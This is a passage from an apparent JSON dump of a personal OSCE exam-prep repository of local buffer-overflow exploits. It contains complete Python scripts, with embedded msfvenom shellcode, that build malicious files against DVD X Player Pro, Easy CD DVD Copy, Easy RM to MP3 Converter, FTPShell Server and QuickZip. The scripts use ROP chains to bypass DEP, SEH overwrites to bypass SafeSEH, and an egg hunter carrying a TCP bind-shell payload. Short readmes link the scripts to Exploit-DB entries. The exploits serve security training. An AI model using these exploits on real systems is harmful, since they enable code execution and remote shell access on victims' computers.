(ptr to jmp esp)        # \n# ESI = ptr to VirtualProtect()          #\n# EDI = ROP NOP (RETN)                   # \n#----------------------------------------#\n \nbuffer += struct.pack('<L', 0x6033cda2)      # POP EAX # RETN [Configuration.dll] \nbuffer += \"MMMM\"                             # compensate (filler)\nbuffer += \"MMMM\"                             # compensate (filler)\nbuffer += \"WWWW\"                             # compensate (filler)\nbuffer += \"WWWW\"                             # compensate (filler)\nbuffer += struct.pack('<L', 0x60366238)      # ptr to &VirtualProtect() [IAT Configuration.dll]\nbuffer += struct.pack('<L', 0x6410b24d)      # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll] \nbuffer += struct.pack('<L', 0x616385d8)      # XCHG EAX,ESI # RETN 0x00 [EPG.dll] \nbuffer += struct.pack('<L', 0x61626545)      # POP EBP # RETN [EPG.dll] \nbuffer += struct.pack('<L', 0x6035453b)      # & push esp # ret 0x10 [Configuration.dll]\nbuffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 0xfffffaff)      # value to negate, will become 0x00000501\nbuffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 0x61640124)      # XCHG EAX,EBX # RETN [EPG.dll] \nbuffer += struct.pack('<L', 0x64022e0f)      # POP EAX # RETN [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 0xffffffc0)      # value to negate, will become 0x00000040\nbuffer += struct.pack('<L', 0x64037950)      # NEG EAX # RETN [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 0x61608ba2)      # XCHG EAX,EDX # RETN [EPG.dll]\nbuffer += struct.pack('<L', 0x603636a4)      # POP ECX # RETN [Configuration.dll] \nbuffer += struct.pack('<L', 0x6411cdfc)      # &Writable location [NetReg.dll]\nbuffer += struct.pack('<L', 0x6162c3b0)      # POP EDI # RETN [EPG.dll] \nbuffer += struct.pack('<L', 0x64041804)      # RETN (ROP NOP) [MediaPlayerCtrl.dll]\nbuffer += struct.pack('<L', 
0x640390d3)      # POP EAX # RETN [MediaPlayerCtrl.dll] \nbuffer += struct.pack('<L', 0x90909090)      # NOP\nbuffer += struct.pack('<L', 0x60358d9f)      # PUSHAD # RETN [Configuration.dll]\n \nbuffer += \"\\x90\" * 20\nbuffer += shellcode\nbuffer += \"\\x90\" * 20\nbuffer += \"\\x43\" * (1500-260-(4*25)-40-len(shellcode))\n\ntry:\n\tf=open(\"OpenMe.plf\",\"w\")\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\n\ttime.sleep(1)\n\tf.write(buffer)\n\tf.close()\n\tprint \"[+] File created. Load that shit up!\"\nexcept:\n\tprint \"File cannot be created\""
  },
  {
    "path": "Local Buffer Overflow/DVDXPlayerProv5.5/readme.md",
    "content": "### DVD X Player Pro v5.5\nLocal Buffer Overflow exploit with DEP bypass (ROP gadgets) using VirtualAlloc() & VirtualProtect() APIs.\n\n![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/DVDXPlayerProv5.5/PoC.jpg)\n"
  },
  {
    "path": "Local Buffer Overflow/EasyCDDVDCopyv1.3.24/Exploit.py",
    "content": "#!/usr/bin/python\n###############################################################################\n# Exploit Title      : Easy CD DVD Copy v1.3.24 - Local Buffer Overflow (SEH) #\n# Exploit Author     : Hashim Jawad                                           #\n# Twitter            : @ihack4falafel                                         # \n# Author Website     : ihack4falafel[.]com                                    #\n# Vendor Homepage    : http://www.divxtodvd.net/index.htm                     #\n# Vulnerable Software: http://www.divxtodvd.net/easy_cd_dvd_copy.exe          #\n# Tested on OS       : Windows XP professional SP3   - (996 bytes offset)     #\n#                      Windows 7  Enterprise   SP1   - (1008 bytes offset)    #   \n#                      Windows 10 Professional 64bit - (988 bytes offset)     #\n# Steps to reproduce :                                                        #\n#                     ~ Copy the content of OpenMe.txt                        #\n#                     ~ Click on Register                                     #\n#                     ~ Paste content in \"Enter User Name\" field              #\n###############################################################################\n\nimport struct\n\n#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b \"\\x00\" -f python -v shellcode (220 bytes)\n\nshellcode =  \"\"\nshellcode += \"\\xbf\\xc6\\xde\\x94\\x3e\\xda\\xd0\\xd9\\x74\\x24\\xf4\\x5d\"\nshellcode += \"\\x31\\xc9\\xb1\\x31\\x31\\x7d\\x13\\x03\\x7d\\x13\\x83\\xc5\"\nshellcode += \"\\xc2\\x3c\\x61\\xc2\\x22\\x42\\x8a\\x3b\\xb2\\x23\\x02\\xde\"\nshellcode += \"\\x83\\x63\\x70\\xaa\\xb3\\x53\\xf2\\xfe\\x3f\\x1f\\x56\\xeb\"\nshellcode += \"\\xb4\\x6d\\x7f\\x1c\\x7d\\xdb\\x59\\x13\\x7e\\x70\\x99\\x32\"\nshellcode += \"\\xfc\\x8b\\xce\\x94\\x3d\\x44\\x03\\xd4\\x7a\\xb9\\xee\\x84\"\nshellcode += \"\\xd3\\xb5\\x5d\\x39\\x50\\x83\\x5d\\xb2\\x2a\\x05\\xe6\\x27\"\nshellcode += 
\"\\xfa\\x24\\xc7\\xf9\\x71\\x7f\\xc7\\xf8\\x56\\x0b\\x4e\\xe3\"\nshellcode += \"\\xbb\\x36\\x18\\x98\\x0f\\xcc\\x9b\\x48\\x5e\\x2d\\x37\\xb5\"\nshellcode += \"\\x6f\\xdc\\x49\\xf1\\x57\\x3f\\x3c\\x0b\\xa4\\xc2\\x47\\xc8\"\nshellcode += \"\\xd7\\x18\\xcd\\xcb\\x7f\\xea\\x75\\x30\\x7e\\x3f\\xe3\\xb3\"\nshellcode += \"\\x8c\\xf4\\x67\\x9b\\x90\\x0b\\xab\\x97\\xac\\x80\\x4a\\x78\"\nshellcode += \"\\x25\\xd2\\x68\\x5c\\x6e\\x80\\x11\\xc5\\xca\\x67\\x2d\\x15\"\nshellcode += \"\\xb5\\xd8\\x8b\\x5d\\x5b\\x0c\\xa6\\x3f\\x31\\xd3\\x34\\x3a\"\nshellcode += \"\\x77\\xd3\\x46\\x45\\x27\\xbc\\x77\\xce\\xa8\\xbb\\x87\\x05\"\nshellcode += \"\\x8d\\x34\\xc2\\x04\\xa7\\xdc\\x8b\\xdc\\xfa\\x80\\x2b\\x0b\"\nshellcode += \"\\x38\\xbd\\xaf\\xbe\\xc0\\x3a\\xaf\\xca\\xc5\\x07\\x77\\x26\"\nshellcode += \"\\xb7\\x18\\x12\\x48\\x64\\x18\\x37\\x2b\\xeb\\x8a\\xdb\\x82\"\nshellcode += \"\\x8e\\x2a\\x79\\xdb\"\n\nbuffer  = \"A\" * 988                      # Junk\nbuffer += \"\\xeb\\x14\\x90\\x90\"             #     + nSEH (Jump Code)\nbuffer += struct.pack('<L', 0x10037b11)  #                       + SEH (pop ebx # pop eax # ret  | [SkinMagic.dll])\nbuffer += \"\\x90\" * 50                    #                                                                         + NOP\nbuffer += shellcode                      #                                                                              + shellcode \nbuffer += \"\\x90\" * 50                    #                                                                                         + NOP\n\ntry:\n\tf=open(\"OpenMe.txt\",\"w\")\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\n\tf.write(buffer)\n\tf.close()\n\tprint \"[+] File created!\"\nexcept:\n\tprint \"File cannot be created\""
  },
  {
    "path": "Local Buffer Overflow/EasyCDDVDCopyv1.3.24/readme.md",
    "content": "### Easy CD DVD Copy v1.3.24\nStructured Exception Handler (SEH) chain overwrite exploit found during my preparation for OSCE; see the link [EDB-ID: 44337](https://www.exploit-db.com/exploits/44337/)\n\n![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/EasyCDDVDCopyv1.3.24/PoC.jpg)\n"
  },
  {
    "path": "Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/Exploit.py",
    "content": "#!/usr/share/python\r\n\r\nimport struct\r\nimport time\r\nimport socket\r\n\r\ndef BufferOverflow():\r\n\t\r\n\t#------------------------------------------------------------------------------#\r\n\t# msfvenom -p windows/exec CMD=calc.exe -b \"\\x00\\x09\\x0A\" -f python -v payload #\r\n\t#------------------------------------------------------------------------------#\r\n\r\n\tshellcode =  \"\"\r\n\tshellcode += \"\\xdd\\xc6\\xd9\\x74\\x24\\xf4\\x5b\\xbf\\xd5\\xc2\\x64\\xc2\"\r\n\tshellcode += \"\\x2b\\xc9\\xb1\\x31\\x83\\xeb\\xfc\\x31\\x7b\\x14\\x03\\x7b\"\r\n\tshellcode += \"\\xc1\\x20\\x91\\x3e\\x01\\x26\\x5a\\xbf\\xd1\\x47\\xd2\\x5a\"\r\n\tshellcode += \"\\xe0\\x47\\x80\\x2f\\x52\\x78\\xc2\\x62\\x5e\\xf3\\x86\\x96\"\r\n\tshellcode += \"\\xd5\\x71\\x0f\\x98\\x5e\\x3f\\x69\\x97\\x5f\\x6c\\x49\\xb6\"\r\n\tshellcode += \"\\xe3\\x6f\\x9e\\x18\\xda\\xbf\\xd3\\x59\\x1b\\xdd\\x1e\\x0b\"\r\n\tshellcode += \"\\xf4\\xa9\\x8d\\xbc\\x71\\xe7\\x0d\\x36\\xc9\\xe9\\x15\\xab\"\r\n\tshellcode += \"\\x99\\x08\\x37\\x7a\\x92\\x52\\x97\\x7c\\x77\\xef\\x9e\\x66\"\r\n\tshellcode += \"\\x94\\xca\\x69\\x1c\\x6e\\xa0\\x6b\\xf4\\xbf\\x49\\xc7\\x39\"\r\n\tshellcode += \"\\x70\\xb8\\x19\\x7d\\xb6\\x23\\x6c\\x77\\xc5\\xde\\x77\\x4c\"\r\n\tshellcode += \"\\xb4\\x04\\xfd\\x57\\x1e\\xce\\xa5\\xb3\\x9f\\x03\\x33\\x37\"\r\n\tshellcode += \"\\x93\\xe8\\x37\\x1f\\xb7\\xef\\x94\\x2b\\xc3\\x64\\x1b\\xfc\"\r\n\tshellcode += \"\\x42\\x3e\\x38\\xd8\\x0f\\xe4\\x21\\x79\\xf5\\x4b\\x5d\\x99\"\r\n\tshellcode += \"\\x56\\x33\\xfb\\xd1\\x7a\\x20\\x76\\xb8\\x10\\xb7\\x04\\xc6\"\r\n\tshellcode += \"\\x56\\xb7\\x16\\xc9\\xc6\\xd0\\x27\\x42\\x89\\xa7\\xb7\\x81\"\r\n\tshellcode += \"\\xee\\x58\\xf2\\x88\\x46\\xf1\\x5b\\x59\\xdb\\x9c\\x5b\\xb7\"\r\n\tshellcode += \"\\x1f\\x99\\xdf\\x32\\xdf\\x5e\\xff\\x36\\xda\\x1b\\x47\\xaa\"\r\n\tshellcode += \"\\x96\\x34\\x22\\xcc\\x05\\x34\\x67\\xaf\\xc8\\xa6\\xeb\\x1e\"\r\n\tshellcode += \"\\x6f\\x4f\\x89\\x5e\"\r\n\t\r\n\t#----------------------------#\r\n\t# 
          Payload          #\r\n\t#----------------------------#\r\n\t# buffer = AAA padding       # |---------------------------------------------------------+\r\n\t# buffer = EIP overwrite     # |--------| WinXP SP3 Pro : \"\\xFF\\xE4\" | [USER32.dll] |----|-+\r\n\t# buffer = NOP sled          # |---------------------------------------------------------|-|-+\r\n\t# buffer = Shellcode         # |---------------------------------------------------------|-|-|-+\r\n\t# buffer = BBB padding       # |---------------------------------------------------------|-|-|-|-+\r\n\t#----------------------------#                                                           | | | | |\r\n\t#                                                                                        | | | | |\r\n\tbuffer  = \"A\" * 26065                              # <-----------------------------------+ | | | |\r\n\tbuffer += struct.pack('<L', 0x7e47bcaf)            # <-------------------------------------+ | | |\r\n\tbuffer += \"\\x90\" * 40                              # <---------------------------------------+ | |\r\n\tbuffer += shellcode                                # <-----------------------------------------+ |\r\n\tbuffer += \"B\" * (30000-26065-4-40-len(shellcode))  # <-------------------------------------------+\r\n\t \r\n\ttry:\r\n\t\tf=open(\"OpenMe.m3u\",\"w\")\r\n\t\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\r\n\t\ttime.sleep(1)\r\n\t\tf.write(buffer)\r\n\t\tf.close()\r\n\t\tprint \"[+] File created. 
Load that shit up!\"\r\n\texcept:\r\n\t\tprint \"File cannot be created\"\r\n\t    \r\ndef main():\r\n\tprint (\r\n\t'''\r\n\t+-+-+-+-+ +-+-+ +-+-+ +-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+\r\n\t|E|a|s|y| |R|M| |t|o| |M|P|3| |C|o|n|v|e|r|t|e|r| |v|2|.|7|.|3|.|7|0|0|\r\n\t+-+-+-+-+ +-+-+ +-+-+ +-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+\r\n\t\t\t+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+\r\n\t\t\t|L|o|c|a|l| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|\r\n\t\t\t+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+\r\n\t'''\r\n    )\r\n\tBufferOverflow()\r\n\t\t\r\nif __name__ == '__main__':\r\n\tmain()"
  },
  {
    "path": "Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/readme.md",
    "content": "### Easy RM to MP3 Converter v2.7.3.700\n\nYet another vanilla saved pointer overwrite (EIP) to pop calc.exe, nothing fancy.\n\n![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/EasyRMtoMP3Converterv2.7.3.700/PoC.JPG)\n"
  },
  {
    "path": "Local Buffer Overflow/FTPShellServerv6.80/Exploit.py",
    "content": "#!/usr/bin/python\n#----------------------------------------------------------------------------------------------------------#\n# Exploit Title      : FTPShell Server v6.80 - Local Buffer Overflow (SafeSEH Bypass)                      #\n# Exploit Author     : Hashim Jawad - @ihack4falafel                                                       #\n# Vendor Homepage    : http://www.ftpshell.com/                                                            #\n# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm                                          #\n# Tested on          : Windows XP Professional SP3                                                         #\n# Steps to reproduce : paste contents of Evil.txt in 'Password' field under configure accounts>Change pass #\n#----------------------------------------------------------------------------------------------------------#\n\n'''\nNotes:\n=====\n* All loaded modules including base binary are compiled with /SAFESEH\n* Null byte '\\x00' get mangled by the program and end up as space '\\x20' \n'''\n\n#root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b \"\\x00\\x0a\\x0d\" -f python -v shellcode\n#Payload size: 447 bytes\nshellcode =  \"\"\nshellcode += \"\\x89\\xe0\\xd9\\xed\\xd9\\x70\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\"\nshellcode += \"\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\"\nshellcode += \"\\x43\\x37\\x52\\x59\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\"\nshellcode += \"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\"\nshellcode += \"\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x79\"\nshellcode += \"\\x6c\\x7a\\x48\\x4c\\x42\\x67\\x70\\x73\\x30\\x57\\x70\\x43\"\nshellcode += \"\\x50\\x4d\\x59\\x4b\\x55\\x36\\x51\\x59\\x50\\x61\\x74\\x4e\"\nshellcode += \"\\x6b\\x56\\x30\\x46\\x50\\x6e\\x6b\\x61\\x42\\x56\\x6c\\x6c\"\nshellcode += \"\\x4b\\x72\\x72\\x32\\x34\\x6e\\x6b\\x61\\x62\\x37\\x58\\x76\"\nshellcode += 
\"\\x6f\\x38\\x37\\x72\\x6a\\x54\\x66\\x55\\x61\\x4b\\x4f\\x4e\"\nshellcode += \"\\x4c\\x45\\x6c\\x30\\x61\\x71\\x6c\\x35\\x52\\x46\\x4c\\x45\"\nshellcode += \"\\x70\\x6b\\x71\\x58\\x4f\\x44\\x4d\\x77\\x71\\x69\\x57\\x7a\"\nshellcode += \"\\x42\\x6c\\x32\\x63\\x62\\x46\\x37\\x4e\\x6b\\x62\\x72\\x62\"\nshellcode += \"\\x30\\x6e\\x6b\\x53\\x7a\\x47\\x4c\\x4c\\x4b\\x52\\x6c\\x74\"\nshellcode += \"\\x51\\x52\\x58\\x6b\\x53\\x62\\x68\\x77\\x71\\x5a\\x71\\x62\"\nshellcode += \"\\x71\\x4e\\x6b\\x76\\x39\\x57\\x50\\x36\\x61\\x4a\\x73\\x6e\"\nshellcode += \"\\x6b\\x47\\x39\\x56\\x78\\x59\\x73\\x65\\x6a\\x52\\x69\\x6e\"\nshellcode += \"\\x6b\\x57\\x44\\x6c\\x4b\\x67\\x71\\x4e\\x36\\x34\\x71\\x6b\"\nshellcode += \"\\x4f\\x6e\\x4c\\x5a\\x61\\x58\\x4f\\x74\\x4d\\x76\\x61\\x4b\"\nshellcode += \"\\x77\\x70\\x38\\x69\\x70\\x52\\x55\\x38\\x76\\x75\\x53\\x51\"\nshellcode += \"\\x6d\\x59\\x68\\x65\\x6b\\x73\\x4d\\x65\\x74\\x43\\x45\\x78\"\nshellcode += \"\\x64\\x61\\x48\\x6c\\x4b\\x36\\x38\\x67\\x54\\x76\\x61\\x49\"\nshellcode += \"\\x43\\x73\\x56\\x4c\\x4b\\x76\\x6c\\x50\\x4b\\x6e\\x6b\\x31\"\nshellcode += \"\\x48\\x77\\x6c\\x43\\x31\\x79\\x43\\x6e\\x6b\\x43\\x34\\x4c\"\nshellcode += \"\\x4b\\x53\\x31\\x7a\\x70\\x4d\\x59\\x37\\x34\\x66\\x44\\x67\"\nshellcode += \"\\x54\\x33\\x6b\\x53\\x6b\\x50\\x61\\x30\\x59\\x31\\x4a\\x63\"\nshellcode += \"\\x61\\x69\\x6f\\x59\\x70\\x71\\x4f\\x51\\x4f\\x33\\x6a\\x6e\"\nshellcode += \"\\x6b\\x76\\x72\\x6a\\x4b\\x6e\\x6d\\x33\\x6d\\x43\\x5a\\x63\"\nshellcode += \"\\x31\\x6c\\x4d\\x6c\\x45\\x4c\\x72\\x47\\x70\\x45\\x50\\x33\"\nshellcode += \"\\x30\\x56\\x30\\x53\\x58\\x74\\x71\\x4e\\x6b\\x62\\x4f\\x4f\"\nshellcode += \"\\x77\\x59\\x6f\\x6b\\x65\\x6f\\x4b\\x4c\\x30\\x4f\\x45\\x6d\"\nshellcode += \"\\x72\\x43\\x66\\x62\\x48\\x39\\x36\\x6a\\x35\\x6f\\x4d\\x4d\"\nshellcode += \"\\x4d\\x59\\x6f\\x5a\\x75\\x47\\x4c\\x53\\x36\\x63\\x4c\\x55\"\nshellcode += \"\\x5a\\x4f\\x70\\x49\\x6b\\x6d\\x30\\x31\\x65\\x53\\x35\\x6d\"\nshellcode += 
\"\\x6b\\x62\\x67\\x37\\x63\\x30\\x72\\x62\\x4f\\x32\\x4a\\x55\"\nshellcode += \"\\x50\\x70\\x53\\x79\\x6f\\x6e\\x35\\x31\\x73\\x71\\x71\\x30\"\nshellcode += \"\\x6c\\x71\\x73\\x46\\x4e\\x43\\x55\\x51\\x68\\x35\\x35\\x35\"\nshellcode += \"\\x50\\x41\\x41\"\n\nbuffer  = '\\xcc' * 2101                      # filler to nSEH offset\nbuffer += '\\xeb\\x06\\x90\\x90'                 # nSEH | hop over SEH \nbuffer += '\\x18\\x05\\xfc\\x7f'                 # SEH  | 0x7ffc0518 : pop edi # pop edi # ret  [SafeSEH Bypass]\nbuffer += '\\x90' * 10                        # nops sled\nbuffer += shellcode                          # calc.exe\nbuffer += '\\xcc' * (5000-2101-4-4-10-len(shellcode))\n\ntry:\n\tf=open(\"Evil.txt\",\"w\")\n\tprint \"[+] Creating %s bytes evil payload..\" %len(buffer)\n\tf.write(buffer)\n\tf.close()\n\tprint \"[+] File created!\"\nexcept Exception as e:\n\tprint e\n"
  },
  {
    "path": "Local Buffer Overflow/FTPShellServerv6.80/README.md",
    "content": "### FTPShell Server v6.80\nA Structured Exception Handler (SEH) overwrite exploit found during my prep for the OSCE; I had to look for an address outside the range of the loaded modules (including the base image) in order to bypass `safeSEH`. See [EDB-ID: 44713](https://www.exploit-db.com/exploits/44713/)\n\n<p align=\"center\">\n  <img src=\"https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/FTPShellServerv6.80/PoC.gif\">\n</p>\n"
  },
  {
    "path": "Local Buffer Overflow/QuickZipv4.60.019/Egg Hunter/Exploit.py",
    "content": "#!/usr/bin/python\r\n\r\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode \r\n#Payload size: 710 bytes\r\nshellcode =  \"T00WT00W\"\r\nshellcode += \"\\x57\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\"\r\nshellcode += \"\\x49\\x49\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\"\r\nshellcode += \"\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\"\r\nshellcode += \"\\x32\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\"\r\nshellcode += \"\\x42\\x75\\x4a\\x49\\x59\\x6c\\x58\\x68\\x4c\\x42\\x53\\x30\"\r\nshellcode += \"\\x35\\x50\\x65\\x50\\x55\\x30\\x6d\\x59\\x38\\x65\\x56\\x51\"\r\nshellcode += \"\\x79\\x50\\x73\\x54\\x6c\\x4b\\x46\\x30\\x36\\x50\\x6c\\x4b\"\r\nshellcode += \"\\x56\\x32\\x44\\x4c\\x6e\\x6b\\x70\\x52\\x44\\x54\\x4c\\x4b\"\r\nshellcode += \"\\x44\\x32\\x44\\x68\\x66\\x6f\\x68\\x37\\x33\\x7a\\x47\\x56\"\r\nshellcode += \"\\x74\\x71\\x4b\\x4f\\x4c\\x6c\\x55\\x6c\\x53\\x51\\x51\\x6c\"\r\nshellcode += \"\\x76\\x62\\x44\\x6c\\x67\\x50\\x4b\\x71\\x68\\x4f\\x44\\x4d\"\r\nshellcode += \"\\x67\\x71\\x4f\\x37\\x59\\x72\\x7a\\x52\\x62\\x72\\x76\\x37\"\r\nshellcode += \"\\x4e\\x6b\\x52\\x72\\x74\\x50\\x6e\\x6b\\x62\\x6a\\x57\\x4c\"\r\nshellcode += \"\\x6c\\x4b\\x50\\x4c\\x77\\x61\\x30\\x78\\x38\\x63\\x67\\x38\"\r\nshellcode += \"\\x76\\x61\\x5a\\x71\\x52\\x71\\x6c\\x4b\\x51\\x49\\x77\\x50\"\r\nshellcode += \"\\x45\\x51\\x49\\x43\\x6e\\x6b\\x71\\x59\\x76\\x78\\x4d\\x33\"\r\nshellcode += \"\\x37\\x4a\\x37\\x39\\x6c\\x4b\\x55\\x64\\x6e\\x6b\\x36\\x61\"\r\nshellcode += \"\\x4b\\x66\\x34\\x71\\x49\\x6f\\x6e\\x4c\\x4b\\x71\\x78\\x4f\"\r\nshellcode += \"\\x44\\x4d\\x73\\x31\\x48\\x47\\x64\\x78\\x6b\\x50\\x74\\x35\"\r\nshellcode += \"\\x68\\x76\\x54\\x43\\x71\\x6d\\x69\\x68\\x45\\x6b\\x63\\x4d\"\r\nshellcode += \"\\x54\\x64\\x52\\x55\\x4d\\x34\\x76\\x38\\x6e\\x6b\\x32\\x78\"\r\nshellcode += 
\"\\x56\\x44\\x67\\x71\\x48\\x53\\x52\\x46\\x4e\\x6b\\x76\\x6c\"\r\nshellcode += \"\\x30\\x4b\\x6c\\x4b\\x62\\x78\\x67\\x6c\\x47\\x71\\x6b\\x63\"\r\nshellcode += \"\\x6e\\x6b\\x77\\x74\\x4c\\x4b\\x66\\x61\\x6a\\x70\\x4b\\x39\"\r\nshellcode += \"\\x53\\x74\\x76\\x44\\x56\\x44\\x63\\x6b\\x51\\x4b\\x35\\x31\"\r\nshellcode += \"\\x76\\x39\\x62\\x7a\\x33\\x61\\x39\\x6f\\x49\\x70\\x43\\x6f\"\r\nshellcode += \"\\x61\\x4f\\x62\\x7a\\x6c\\x4b\\x62\\x32\\x7a\\x4b\\x4c\\x4d\"\r\nshellcode += \"\\x43\\x6d\\x70\\x68\\x76\\x53\\x37\\x42\\x45\\x50\\x45\\x50\"\r\nshellcode += \"\\x63\\x58\\x74\\x37\\x72\\x53\\x46\\x52\\x61\\x4f\\x66\\x34\"\r\nshellcode += \"\\x30\\x68\\x70\\x4c\\x71\\x67\\x74\\x66\\x36\\x67\\x6b\\x4f\"\r\nshellcode += \"\\x38\\x55\\x4f\\x48\\x6c\\x50\\x33\\x31\\x75\\x50\\x67\\x70\"\r\nshellcode += \"\\x34\\x69\\x4b\\x74\\x31\\x44\\x62\\x70\\x42\\x48\\x54\\x69\"\r\nshellcode += \"\\x4b\\x30\\x62\\x4b\\x63\\x30\\x39\\x6f\\x78\\x55\\x33\\x5a\"\r\nshellcode += \"\\x46\\x68\\x46\\x39\\x66\\x30\\x38\\x62\\x4b\\x4d\\x61\\x50\"\r\nshellcode += \"\\x30\\x50\\x47\\x30\\x46\\x30\\x65\\x38\\x68\\x6a\\x54\\x4f\"\r\nshellcode += \"\\x69\\x4f\\x6b\\x50\\x59\\x6f\\x6b\\x65\\x6f\\x67\\x55\\x38\"\r\nshellcode += \"\\x44\\x42\\x65\\x50\\x66\\x71\\x63\\x6c\\x4b\\x39\\x4a\\x46\"\r\nshellcode += \"\\x33\\x5a\\x42\\x30\\x32\\x76\\x43\\x67\\x55\\x38\\x6a\\x62\"\r\nshellcode += \"\\x69\\x4b\\x56\\x57\\x33\\x57\\x49\\x6f\\x78\\x55\\x73\\x67\"\r\nshellcode += \"\\x31\\x78\\x6e\\x57\\x58\\x69\\x57\\x48\\x39\\x6f\\x79\\x6f\"\r\nshellcode += \"\\x69\\x45\\x43\\x67\\x70\\x68\\x54\\x34\\x7a\\x4c\\x45\\x6b\"\r\nshellcode += \"\\x78\\x61\\x69\\x6f\\x4b\\x65\\x63\\x67\\x6a\\x37\\x65\\x38\"\r\nshellcode += \"\\x42\\x55\\x52\\x4e\\x72\\x6d\\x30\\x61\\x79\\x6f\\x6b\\x65\"\r\nshellcode += \"\\x35\\x38\\x52\\x43\\x30\\x6d\\x71\\x74\\x67\\x70\\x4b\\x39\"\r\nshellcode += \"\\x6b\\x53\\x31\\x47\\x62\\x77\\x31\\x47\\x76\\x51\\x49\\x66\"\r\nshellcode += 
\"\\x33\\x5a\\x57\\x62\\x31\\x49\\x73\\x66\\x6d\\x32\\x6b\\x4d\"\r\nshellcode += \"\\x53\\x56\\x69\\x57\\x73\\x74\\x67\\x54\\x55\\x6c\\x35\\x51\"\r\nshellcode += \"\\x45\\x51\\x6c\\x4d\\x73\\x74\\x51\\x34\\x52\\x30\\x5a\\x66\"\r\nshellcode += \"\\x45\\x50\\x42\\x64\\x71\\x44\\x42\\x70\\x32\\x76\\x53\\x66\"\r\nshellcode += \"\\x50\\x56\\x47\\x36\\x36\\x36\\x50\\x4e\\x52\\x76\\x32\\x76\"\r\nshellcode += \"\\x50\\x53\\x73\\x66\\x62\\x48\\x43\\x49\\x4a\\x6c\\x37\\x4f\"\r\nshellcode += \"\\x6c\\x46\\x79\\x6f\\x4b\\x65\\x4c\\x49\\x59\\x70\\x30\\x4e\"\r\nshellcode += \"\\x42\\x76\\x32\\x66\\x39\\x6f\\x50\\x30\\x51\\x78\\x74\\x48\"\r\nshellcode += \"\\x6f\\x77\\x45\\x4d\\x35\\x30\\x49\\x6f\\x4e\\x35\\x6d\\x6b\"\r\nshellcode += \"\\x6c\\x30\\x58\\x35\\x4e\\x42\\x46\\x36\\x73\\x58\\x6f\\x56\"\r\nshellcode += \"\\x6f\\x65\\x6f\\x4d\\x4f\\x6d\\x69\\x6f\\x7a\\x75\\x65\\x6c\"\r\nshellcode += \"\\x37\\x76\\x71\\x6c\\x45\\x5a\\x6d\\x50\\x79\\x6b\\x4b\\x50\"\r\nshellcode += \"\\x33\\x45\\x46\\x65\\x6d\\x6b\\x57\\x37\\x56\\x73\\x64\\x32\"\r\nshellcode += \"\\x52\\x4f\\x63\\x5a\\x47\\x70\\x51\\x43\\x49\\x6f\\x4a\\x75\"\r\nshellcode += \"\\x41\\x41\"\r\n\r\n####################### ZIP File Structure ######################## \r\n###################################################################\r\n######################## Local File Header ########################\r\nLocalFileHeader  = '\\x50\\x4b\\x03\\x04' # local file header signature\r\nLocalFileHeader += '\\x14\\x00'         # version needed to extract 0x14 = 20 -> 2.0\r\nLocalFileHeader += '\\x00\\x00'         # general purpose bit flag\r\nLocalFileHeader += '\\x00\\x00'         # compression method\r\nLocalFileHeader += '\\xb7\\xac'         # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nLocalFileHeader += '\\xce\\x34'         # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nLocalFileHeader += '\\x00\\x00\\x00'     # CRC-32 '\\x00' was left out to make sure we hit 25 bytes before file 
length\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # compressed size\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nLocalFileHeader += '\\xe4\\x0f'         # file name length 0x0fe4 = 4068 bytes \r\nLocalFileHeader += '\\x00\\x00'         # extra field length\r\nLocalFileHeader += '\\x00'             # file name\r\n#LocalFileHeader += '\\x00'             # extra filed \r\n################## Central Directory File Header ##################\r\nCDFileHeader     = '\\x50\\x4b\\x01\\x02' # cd file header signature \r\nCDFileHeader    += '\\x14\\x00'         # version made by 0x14 = 20 -> 2.0\r\nCDFileHeader    += '\\x14\\x00'         # version needed to extract 0x14 = 20 -> 2.0\r\nCDFileHeader    += '\\x00\\x00'         # general purpose bit flag\r\nCDFileHeader    += '\\x00\\x00'         # compression method \r\nCDFileHeader    += '\\xb7\\xac'         # file last modification time 